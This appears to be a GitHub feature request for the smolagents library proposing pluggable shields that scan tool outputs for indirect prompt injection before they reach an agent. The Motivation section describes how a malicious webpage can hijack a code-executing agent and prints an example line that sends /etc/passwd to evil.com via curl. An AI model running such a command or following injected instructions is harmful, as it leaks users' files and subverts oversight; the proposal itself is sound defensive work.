[Feature] Native indirect prompt injection shield for tool outputs

## Motivation

When an agent browses the web or calls any external tool, the tool output enters 
the agent's context window without any sanitization. A malicious webpage or API 
response can contain hidden instructions that hijack the agent's behavior — this 
is an indirect prompt injection attack.

This is especially dangerous for `CodeAgent`, which generates and **executes real 
Python code**. A compromised tool output could manipulate the LLM into writing:

os.system('curl http://evil.com?data=' + open('/etc/passwd').read())

The smolagents docs already acknowledge this threat:
> "An agent browsing the web could arrive on a malicious website that contains 
> harmful instructions"

But the only current defense is sandboxing code *execution*. There is no 
protection against the LLM being *manipulated into writing* malicious code 
in the first place. This affects every production smolagents deployment that 
touches external data.

## Proposed feature

A pluggable `shields=` parameter on all agents that scans every tool output 
before it enters the context window.
```python
from smolagents import CodeAgent
from smolagents.security import PatternShield, PromptGuardShield, ShieldAction

# Zero dependencies — instant regex-based detection
agent = CodeAgent(tools=[web_search], model=model, shields=[PatternShield()])

# ML-based — Meta's Llama Prompt Guard 2 (pip install smolagents[shield])
agent = CodeAgent(tools=[web_search], model=model, shields=[PromptGuardShield()])

# Three actions available
PatternShield(action=ShieldAction.BLOCK)     # raise InjectionDetectedError
PatternShield(action=ShieldAction.SANITIZE)  # strip injection, agent continues
PatternShield(action=ShieldAction.WARN)      # log warning, agent continues
```

Design follows the same pattern as `AbstractToolset` — a clean `ShieldBase` 
protocol users can subclass for custom shields (external APIs, fine-tuned 
classifiers, etc).

I have a working implementation ready with 57 passing tests covering edge cases, 
unicode, buried injections, and agent integration. Happy to open a PR immediately.

## Related

- OWASP LLM Top 10 — LLM01: Prompt Injection  
  https://owasp.org/www-project-top-10-for-large-language-model-applications/
- Meta Llama Prompt Guard 2:  
  https://huggingface.co/meta-llama/Prompt-Guard-2-86M
- No other major agent framework has this natively at the tool output layer

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Feature] Native indirect prompt injection shield for tool outputs #2114

Motivation

Proposed feature

Related

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[Feature] Native indirect prompt injection shield for tool outputs #2114

Description

Motivation

Proposed feature

Related

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions